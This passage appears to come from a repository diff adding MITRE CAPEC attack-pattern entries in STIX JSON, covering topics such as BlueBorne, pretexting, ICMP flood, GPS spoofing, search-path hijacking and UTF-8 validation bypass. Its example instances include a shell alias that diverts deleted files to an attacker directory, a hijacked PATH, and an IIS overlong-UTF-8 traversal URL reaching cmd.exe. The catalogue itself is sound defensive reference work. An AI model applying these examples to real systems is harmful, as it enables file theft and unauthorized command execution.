+ "x_capec_example_instances": [
50
+ "BlueBorne refers to a set of nine vulnerabilities on different platforms (Linux, Windows, Android, iOS) that offer an adversary the ability to install and execute malicious code on a system if they were close in proximity to a Bluetooth enabled device. One vulnerability affecting iOS versions 7 through 9 allowed an attacker to overflow the Low Energy Audio Protocol since commands sent over this protocol are improperly validated and gain the elevated permissions of the Bluetooth stack. These vulnerabilities were a result of poor validation and were patched shortly after their exposure in 2017, but many non-updated devices remain vulnerable."
51
+ ],
52
+ "x_capec_likelihood_of_attack": "Medium",
53
+ "x_capec_parent_of_refs": [
54
+ "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a"
55
+ ],
56
+ "x_capec_prerequisites": [
57
+ "Knowledge of the target system's vulnerabilities that can be capitalized on with malicious code.The adversary must be able to place the malicious code on the target system."
58
+ ],
59
+ "x_capec_resources_required": [
60
+ "The means by which the adversary intends to place the malicious code on the system dictates the tools required. For example, suppose the adversary wishes to leverage social engineering and convince a legitimate user to open a malicious file attached to a seemingly legitimate email. In this case, the adversary might require a tool capable of wrapping malicious code into an innocuous filetype (e.g., PDF, .doc, etc.)"
61
+ ],
62
+ "x_capec_status": "Stable",
63
+ "x_capec_typical_severity": "High",
64
+ "x_capec_version": "3.9"
65
+ }
66
+ ],
67
+ "spec_version": "2.0",
68
+ "type": "bundle"
69
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2d533987-71b1-41a3-873b-38d63188d2eb.json ADDED
@@ -0,0 +1,43 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--47d77b6f-6450-4fc9-b6a1-b7701a549dd6",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An adversary engages in pretexting behavior, assuming the role of someone who works for Customer Service, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary's interests. One example of a scenario such as this would be to call an individual, articulate your false affiliation with a credit card company, and then attempt to get the individual to verify their credit card number.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-412",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/412.html"
13
+ },
14
+ {
15
+ "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC",
16
+ "external_id": "REF-348",
17
+ "source_name": "reference_from_CAPEC",
18
+ "url": "http://www.social-engineer.org"
19
+ }
20
+ ],
21
+ "id": "attack-pattern--2d533987-71b1-41a3-873b-38d63188d2eb",
22
+ "modified": "2019-09-30T00:00:00.000Z",
23
+ "name": "Pretexting via Customer Service",
24
+ "object_marking_refs": [
25
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
26
+ ],
27
+ "type": "attack-pattern",
28
+ "x_capec_abstraction": "Detailed",
29
+ "x_capec_child_of_refs": [
30
+ "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30"
31
+ ],
32
+ "x_capec_domains": [
33
+ "Social Engineering",
34
+ "Social Engineering"
35
+ ],
36
+ "x_capec_status": "Draft",
37
+ "x_capec_typical_severity": "Low",
38
+ "x_capec_version": "3.9"
39
+ }
40
+ ],
41
+ "spec_version": "2.0",
42
+ "type": "bundle"
43
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2d865521-82f5-42e5-a595-dc93f60dfd3f.json ADDED
@@ -0,0 +1,79 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--1ac8f478-0d07-4137-9d95-d48a3207169f",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "This OS fingerprinting probe performs a checksum on any ASCII data contained within the data portion or a RST packet. Some operating systems will report a human-readable text message in the payload of a 'RST' (reset) packet when specific types of connection errors occur. RFC 1122 allows text payloads within reset packets but not all operating systems or routers implement this functionality.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-328",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/328.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-200",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/200.html"
18
+ },
19
+ {
20
+ "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
21
+ "external_id": "REF-33",
22
+ "source_name": "reference_from_CAPEC"
23
+ },
24
+ {
25
+ "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)",
26
+ "external_id": "REF-128",
27
+ "source_name": "reference_from_CAPEC",
28
+ "url": "http://www.faqs.org/rfcs/rfc793.html"
29
+ },
30
+ {
31
+ "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC",
32
+ "external_id": "REF-212",
33
+ "source_name": "reference_from_CAPEC"
34
+ }
35
+ ],
36
+ "id": "attack-pattern--2d865521-82f5-42e5-a595-dc93f60dfd3f",
37
+ "modified": "2018-07-31T00:00:00.000Z",
38
+ "name": "TCP 'RST' Flag Checksum Probe",
39
+ "object_marking_refs": [
40
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
41
+ ],
42
+ "type": "attack-pattern",
43
+ "x_capec_abstraction": "Detailed",
44
+ "x_capec_child_of_refs": [
45
+ "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617"
46
+ ],
47
+ "x_capec_consequences": {
48
+ "Access_Control": [
49
+ "Bypass Protection Mechanism",
50
+ "Hide Activities"
51
+ ],
52
+ "Authorization": [
53
+ "Bypass Protection Mechanism",
54
+ "Hide Activities"
55
+ ],
56
+ "Confidentiality": [
57
+ "Read Data",
58
+ "Bypass Protection Mechanism",
59
+ "Hide Activities"
60
+ ]
61
+ },
62
+ "x_capec_domains": [
63
+ "Software"
64
+ ],
65
+ "x_capec_likelihood_of_attack": "Medium",
66
+ "x_capec_prerequisites": [
67
+ "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."
68
+ ],
69
+ "x_capec_resources_required": [
70
+ "A tool capable of sending and receiving packets from a remote system."
71
+ ],
72
+ "x_capec_status": "Stable",
73
+ "x_capec_typical_severity": "Low",
74
+ "x_capec_version": "3.9"
75
+ }
76
+ ],
77
+ "spec_version": "2.0",
78
+ "type": "bundle"
79
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2e017307-7bab-419b-972c-8dae9e089572.json ADDED
@@ -0,0 +1,44 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--9a2eaaaa-a1ce-452c-ae7a-80f3b94cfa0e",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An adversary may execute a flooding attack using the ICMP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. A typical attack involves a victim server receiving ICMP packets at a high rate from a wide range of source addresses. Additionally, due to the session-less nature of the ICMP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-487",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/487.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-770",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/770.html"
18
+ }
19
+ ],
20
+ "id": "attack-pattern--2e017307-7bab-419b-972c-8dae9e089572",
21
+ "modified": "2022-09-29T00:00:00.000Z",
22
+ "name": "ICMP Flood",
23
+ "object_marking_refs": [
24
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
25
+ ],
26
+ "type": "attack-pattern",
27
+ "x_capec_abstraction": "Standard",
28
+ "x_capec_child_of_refs": [
29
+ "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed"
30
+ ],
31
+ "x_capec_domains": [
32
+ "Communications",
33
+ "Software"
34
+ ],
35
+ "x_capec_prerequisites": [
36
+ "This type of an attack requires the ability to generate a large amount of ICMP traffic to send to the target server."
37
+ ],
38
+ "x_capec_status": "Draft",
39
+ "x_capec_version": "3.9"
40
+ }
41
+ ],
42
+ "spec_version": "2.0",
43
+ "type": "bundle"
44
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2e1be870-6442-4978-9a30-46d518aa1f74.json ADDED
@@ -0,0 +1,55 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--460f3b63-b5d2-4f7f-8bb7-03b8586932a9",
3
+ "objects": [
4
+ {
5
+ "created": "2015-11-09T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An adversary attempts to deceive a GPS receiver by broadcasting counterfeit GPS signals, structured to resemble a set of normal GPS signals. These spoofed signals may be structured in such a way as to cause the receiver to estimate its position to be somewhere other than where it actually is, or to be located where it is but at a different time, as determined by the adversary.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-627",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/627.html"
13
+ }
14
+ ],
15
+ "id": "attack-pattern--2e1be870-6442-4978-9a30-46d518aa1f74",
16
+ "modified": "2019-04-04T00:00:00.000Z",
17
+ "name": "Counterfeit GPS Signals",
18
+ "object_marking_refs": [
19
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
20
+ ],
21
+ "type": "attack-pattern",
22
+ "x_capec_abstraction": "Standard",
23
+ "x_capec_child_of_refs": [
24
+ "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b"
25
+ ],
26
+ "x_capec_consequences": {
27
+ "Integrity": [
28
+ "Modify Data"
29
+ ]
30
+ },
31
+ "x_capec_domains": [
32
+ "Communications",
33
+ "Hardware"
34
+ ],
35
+ "x_capec_likelihood_of_attack": "Low",
36
+ "x_capec_parent_of_refs": [
37
+ "attack-pattern--3b7a108f-f42f-42c7-99be-a16ec15ca0ff"
38
+ ],
39
+ "x_capec_prerequisites": [
40
+ "The target must be relying on valid GPS signal to perform critical operations."
41
+ ],
42
+ "x_capec_resources_required": [
43
+ "Ability to create spoofed GPS signals."
44
+ ],
45
+ "x_capec_skills_required": {
46
+ "High": "The ability to spoof GPS signals is not trival."
47
+ },
48
+ "x_capec_status": "Draft",
49
+ "x_capec_typical_severity": "High",
50
+ "x_capec_version": "3.9"
51
+ }
52
+ ],
53
+ "spec_version": "2.0",
54
+ "type": "bundle"
55
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2e2ed1f8-f736-4fc9-83bc-308595fc6e03.json ADDED
@@ -0,0 +1,60 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--43ebf2c0-5230-451c-bc37-d2e7813658b7",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-114",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/114.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-287",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/287.html"
18
+ },
19
+ {
20
+ "external_id": "CWE-1244",
21
+ "source_name": "cwe",
22
+ "url": "http://cwe.mitre.org/data/definitions/1244.html"
23
+ },
24
+ {
25
+ "description": "Abuse Elevation Control Mechanism",
26
+ "external_id": "T1548",
27
+ "source_name": "ATTACK",
28
+ "url": "https://attack.mitre.org/wiki/Technique/T1548"
29
+ }
30
+ ],
31
+ "id": "attack-pattern--2e2ed1f8-f736-4fc9-83bc-308595fc6e03",
32
+ "modified": "2022-02-22T00:00:00.000Z",
33
+ "name": "Authentication Abuse",
34
+ "object_marking_refs": [
35
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
36
+ ],
37
+ "type": "attack-pattern",
38
+ "x_capec_abstraction": "Meta",
39
+ "x_capec_domains": [
40
+ "Software",
41
+ "Hardware"
42
+ ],
43
+ "x_capec_extended_description": "\n <xhtml:p>This attack may exploit assumptions made by the target's authentication procedures, such as assumptions regarding trust relationships or assumptions regarding the generation of secret values. This attack differs from Authentication Bypass attacks in that Authentication Abuse allows the attacker to be certified as a valid user through illegitimate means, while Authentication Bypass allows the user to access protected material without ever being certified as an authenticated user. This attack does not rely on prior sessions established by successfully authenticating users, as relied upon for the \"Exploitation of Session Variables, Resource IDs and other Trusted Credentials\" attack patterns.</xhtml:p>\n ",
44
+ "x_capec_parent_of_refs": [
45
+ "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a"
46
+ ],
47
+ "x_capec_prerequisites": [
48
+ "An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc. which is flawed in some way."
49
+ ],
50
+ "x_capec_resources_required": [
51
+ "A client application, command-line access to a binary, or scripting language capable of interacting with the authentication mechanism."
52
+ ],
53
+ "x_capec_status": "Draft",
54
+ "x_capec_typical_severity": "Medium",
55
+ "x_capec_version": "3.9"
56
+ }
57
+ ],
58
+ "spec_version": "2.0",
59
+ "type": "bundle"
60
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4.json ADDED
@@ -0,0 +1,92 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--19ef15c5-dbf3-42b6-9309-94f3c7eb9d3c",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "This pattern of attack sees an adversary load a malicious resource into a program's standard path so that when a known command is executed then the system instead executes the malicious component. The adversary can either modify the search path a program uses, like a PATH variable or classpath, or they can manipulate resources on the path to point to their malicious components. J2EE applications and other component based applications that are built from multiple binaries can have very long list of dependencies to execute. If one of these libraries and/or references is controllable by the attacker then application controls can be circumvented by the attacker.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-38",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/38.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-426",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/426.html"
18
+ },
19
+ {
20
+ "external_id": "CWE-427",
21
+ "source_name": "cwe",
22
+ "url": "http://cwe.mitre.org/data/definitions/427.html"
23
+ },
24
+ {
25
+ "description": "Hijack Execution Flow: Path Interception by PATH Environment Variable",
26
+ "external_id": "T1574.007",
27
+ "source_name": "ATTACK",
28
+ "url": "https://attack.mitre.org/wiki/Technique/T1574/007"
29
+ },
30
+ {
31
+ "description": "Hijack Execution Flow: Path Interception by Unquoted Path",
32
+ "external_id": "T1574.009",
33
+ "source_name": "ATTACK",
34
+ "url": "https://attack.mitre.org/wiki/Technique/T1574/009"
35
+ },
36
+ {
37
+ "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
38
+ "external_id": "REF-1",
39
+ "source_name": "reference_from_CAPEC"
40
+ }
41
+ ],
42
+ "id": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4",
43
+ "modified": "2022-09-29T00:00:00.000Z",
44
+ "name": "Leveraging/Manipulating Configuration File Search Paths",
45
+ "object_marking_refs": [
46
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
47
+ ],
48
+ "type": "attack-pattern",
49
+ "x_capec_abstraction": "Detailed",
50
+ "x_capec_child_of_refs": [
51
+ "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b"
52
+ ],
53
+ "x_capec_consequences": {
54
+ "Access_Control": [
55
+ "Gain Privileges"
56
+ ],
57
+ "Authorization": [
58
+ "Gain Privileges"
59
+ ],
60
+ "Availability": [
61
+ "Execute Unauthorized Commands (Run Arbitrary Code)"
62
+ ],
63
+ "Confidentiality": [
64
+ "Execute Unauthorized Commands (Run Arbitrary Code)",
65
+ "Gain Privileges"
66
+ ],
67
+ "Integrity": [
68
+ "Execute Unauthorized Commands (Run Arbitrary Code)"
69
+ ]
70
+ },
71
+ "x_capec_domains": [
72
+ "Software"
73
+ ],
74
+ "x_capec_example_instances": [
75
+ "\n <xhtml:p>Another method is to redirect commands by aliasing one legitimate command to another to create unexpected results. the Unix command \"rm\" could be aliased to \"mv\" and move all files the victim thinks they are deleting to a directory the attacker controls. In a Unix shell .profile setting</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"informative\">alias rm=mv /usr/home/attacker</xhtml:div>\n <xhtml:p>In this case the attacker retains a copy of all the files the victim attempts to remove.</xhtml:p>\n ",
76
+ "\n <xhtml:p>A standard UNIX path looks similar to this</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"informative\">/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin</xhtml:div>\n <xhtml:p>If the attacker modifies the path variable to point to a locale that includes malicious resources then the user unwittingly can execute commands on the attackers' behalf:</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"informative\">/evildir/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin</xhtml:div>\n <xhtml:p>This is a form of usurping control of the program and the attack can be done on the classpath, database resources, or any other resources built from compound parts. At runtime detection and blocking of this attack is nearly impossible, because the configuration allows execution.</xhtml:p>\n "
77
+ ],
78
+ "x_capec_likelihood_of_attack": "High",
79
+ "x_capec_prerequisites": [
80
+ "The attacker must be able to write to redirect search paths on the victim host."
81
+ ],
82
+ "x_capec_skills_required": {
83
+ "Low": "To identify and execute against an over-privileged system interface"
84
+ },
85
+ "x_capec_status": "Draft",
86
+ "x_capec_typical_severity": "Very High",
87
+ "x_capec_version": "3.9"
88
+ }
89
+ ],
90
+ "spec_version": "2.0",
91
+ "type": "bundle"
92
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497.json ADDED
@@ -0,0 +1,176 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--319237d5-fab5-4c10-8a22-406a632470c0",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "This attack is a specific variation on leveraging alternate encodings to bypass validation logic. This attack leverages the possibility to encode potentially harmful input in UTF-8 and submit it to applications not expecting or effective at validating this encoding standard making input filtering difficult. UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. Legal UTF-8 characters are one to four bytes long. However, early version of the UTF-8 specification got some entries wrong (in some cases it permitted overlong characters). UTF-8 encoders are supposed to use the \"shortest possible\" encoding, but naive decoders may accept encodings that are longer than necessary. According to the RFC 3629, a particularly subtle form of this attack can be carried out against a parser which performs security-critical validity checks against the UTF-8 encoded form of its input, but interprets certain illegal octet sequences as characters.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-80",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/80.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-173",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/173.html"
18
+ },
19
+ {
20
+ "external_id": "CWE-172",
21
+ "source_name": "cwe",
22
+ "url": "http://cwe.mitre.org/data/definitions/172.html"
23
+ },
24
+ {
25
+ "external_id": "CWE-180",
26
+ "source_name": "cwe",
27
+ "url": "http://cwe.mitre.org/data/definitions/180.html"
28
+ },
29
+ {
30
+ "external_id": "CWE-181",
31
+ "source_name": "cwe",
32
+ "url": "http://cwe.mitre.org/data/definitions/181.html"
33
+ },
34
+ {
35
+ "external_id": "CWE-73",
36
+ "source_name": "cwe",
37
+ "url": "http://cwe.mitre.org/data/definitions/73.html"
38
+ },
39
+ {
40
+ "external_id": "CWE-74",
41
+ "source_name": "cwe",
42
+ "url": "http://cwe.mitre.org/data/definitions/74.html"
43
+ },
44
+ {
45
+ "external_id": "CWE-20",
46
+ "source_name": "cwe",
47
+ "url": "http://cwe.mitre.org/data/definitions/20.html"
48
+ },
49
+ {
50
+ "external_id": "CWE-697",
51
+ "source_name": "cwe",
52
+ "url": "http://cwe.mitre.org/data/definitions/697.html"
53
+ },
54
+ {
55
+ "external_id": "CWE-692",
56
+ "source_name": "cwe",
57
+ "url": "http://cwe.mitre.org/data/definitions/692.html"
58
+ },
59
+ {
60
+ "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
61
+ "external_id": "REF-1",
62
+ "source_name": "reference_from_CAPEC"
63
+ },
64
+ {
65
+ "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO",
66
+ "external_id": "REF-112",
67
+ "source_name": "reference_from_CAPEC",
68
+ "url": "http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/character-encoding.html"
69
+ },
70
+ {
71
+ "description": "Michael Howard, David LeBlanc, Writing Secure Code, Microsoft Press",
72
+ "external_id": "REF-530",
73
+ "source_name": "reference_from_CAPEC"
74
+ },
75
+ {
76
+ "description": "Bruce Schneier, Security Risks of Unicode, Crypto-Gram Newsletter, 2000--07---15",
77
+ "external_id": "REF-531",
78
+ "source_name": "reference_from_CAPEC",
79
+ "url": "https://www.schneier.com/crypto-gram/archives/2000/0715.html"
80
+ },
81
+ {
82
+ "description": "Wikipedia, The Wikimedia Foundation, Inc",
83
+ "external_id": "REF-532",
84
+ "source_name": "reference_from_CAPEC",
85
+ "url": "http://en.wikipedia.org/wiki/UTF-8"
86
+ },
87
+ {
88
+ "description": "F. Yergeau, RFC 3629 - UTF-8, a transformation format of ISO 10646, 2003--11",
89
+ "external_id": "REF-533",
90
+ "source_name": "reference_from_CAPEC",
91
+ "url": "http://www.faqs.org/rfcs/rfc3629.html"
92
+ },
93
+ {
94
+ "description": "Eric Hacker, IDS Evasion with Unicode, 2001--01---03",
95
+ "external_id": "REF-114",
96
+ "source_name": "reference_from_CAPEC",
97
+ "url": "http://www.securityfocus.com/infocus/1232"
98
+ },
99
+ {
100
+ "description": "Corrigendum #1: UTF-8 Shortest Form, The Unicode Standard, 2001--03, Unicode, Inc.",
101
+ "external_id": "REF-535",
102
+ "source_name": "reference_from_CAPEC",
103
+ "url": "http://www.unicode.org/versions/corrigendum1.html"
104
+ },
105
+ {
106
+ "description": "Markus Kuhn, UTF-8 and Unicode FAQ for Unix/Linux, 1999--06---04",
107
+ "external_id": "REF-525",
108
+ "source_name": "reference_from_CAPEC",
109
+ "url": "http://www.cl.cam.ac.uk/~mgk25/unicode.html"
110
+ },
111
+ {
112
+ "description": "Markus Kuhn, UTF-8 decoder capability and stress test, 2003--02---19",
113
+ "external_id": "REF-537",
114
+ "source_name": "reference_from_CAPEC",
115
+ "url": "http://www.cl.cam.ac.uk/%7Emgk25/ucs/examples/UTF-8-test.txt"
116
+ }
117
+ ],
118
+ "id": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497",
119
+ "modified": "2022-09-29T00:00:00.000Z",
120
+ "name": "Using UTF-8 Encoding to Bypass Validation Logic",
121
+ "object_marking_refs": [
122
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
123
+ ],
124
+ "type": "attack-pattern",
125
+ "x_capec_abstraction": "Detailed",
126
+ "x_capec_child_of_refs": [
127
+ "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce"
128
+ ],
129
+ "x_capec_consequences": {
130
+ "Access_Control": [
131
+ "Bypass Protection Mechanism"
132
+ ],
133
+ "Authorization": [
134
+ "Bypass Protection Mechanism"
135
+ ],
136
+ "Availability": [
137
+ "Execute Unauthorized Commands (Run Arbitrary Code)",
138
+ "Unreliable Execution"
139
+ ],
140
+ "Confidentiality": [
141
+ "Bypass Protection Mechanism",
142
+ "Execute Unauthorized Commands (Run Arbitrary Code)"
143
+ ],
144
+ "Integrity": [
145
+ "Execute Unauthorized Commands (Run Arbitrary Code)",
146
+ "Modify Data"
147
+ ]
148
+ },
149
+ "x_capec_domains": [
150
+ "Software"
151
+ ],
152
+ "x_capec_example_instances": [
153
+ "\n <xhtml:p>Perhaps the most famous UTF-8 attack was against unpatched Microsoft Internet Information Server (IIS) 4 and IIS 5 servers. If an attacker made a request that looked like this</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"attack\">http://servername/scripts/..%c0%af../winnt/system32/ cmd.exe</xhtml:div>\n <xhtml:p>the server didn't correctly handle %c0%af in the URL. What do you think %c0%af means? It's 11000000 10101111 in binary; and if it's broken up using the UTF-8 mapping rules, we get this: 11000000 10101111. Therefore, the character is 00000101111, or 0x2F, the slash (/) character! The %c0%af is an invalid UTF-8 representation of the / character. Such an invalid UTF-8 escape is often referred to as an overlong sequence.</xhtml:p>\n <xhtml:p>So when the attacker requested the tainted URL, they accessed</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"result\">http://servername/scripts/../../winnt/system32/cmd.exe</xhtml:div>\n <xhtml:p>In other words, they walked out of the script's virtual directory, which is marked to allow program execution, up to the root and down into the system32 directory, where they could pass commands to the command shell, Cmd.exe.</xhtml:p>See also: CVE-2000-0884"
154
+ ],
155
+ "x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Survey the application for user-controllable inputs: </b>Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.</td></tr><tr><td>Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.</td></tr><tr><td>Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Probe entry points to locate vulnerabilities: </b>The attacker uses the entry points gathered in the \"Explore\" phase as a target list and injects various UTF-8 encoded payloads to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Try to use UTF-8 encoding of content in Scripts in order to bypass validation routines.</td></tr><tr><td>Try to use UTF-8 encoding of content in HTML in order to bypass validation routines.</td></tr><tr><td>Try to use UTF-8 encoding of content in CSS in order to bypass validation routines.</td></tr></tbody></table></ol></div>",
156
+ "x_capec_likelihood_of_attack": "High",
157
+ "x_capec_peer_of_refs": [
158
+ "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732",
159
+ "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770"
160
+ ],
161
+ "x_capec_prerequisites": [
162
+ "The application's UTF-8 decoder accepts and interprets illegal UTF-8 characters or non-shortest format of UTF-8 encoding.",
163
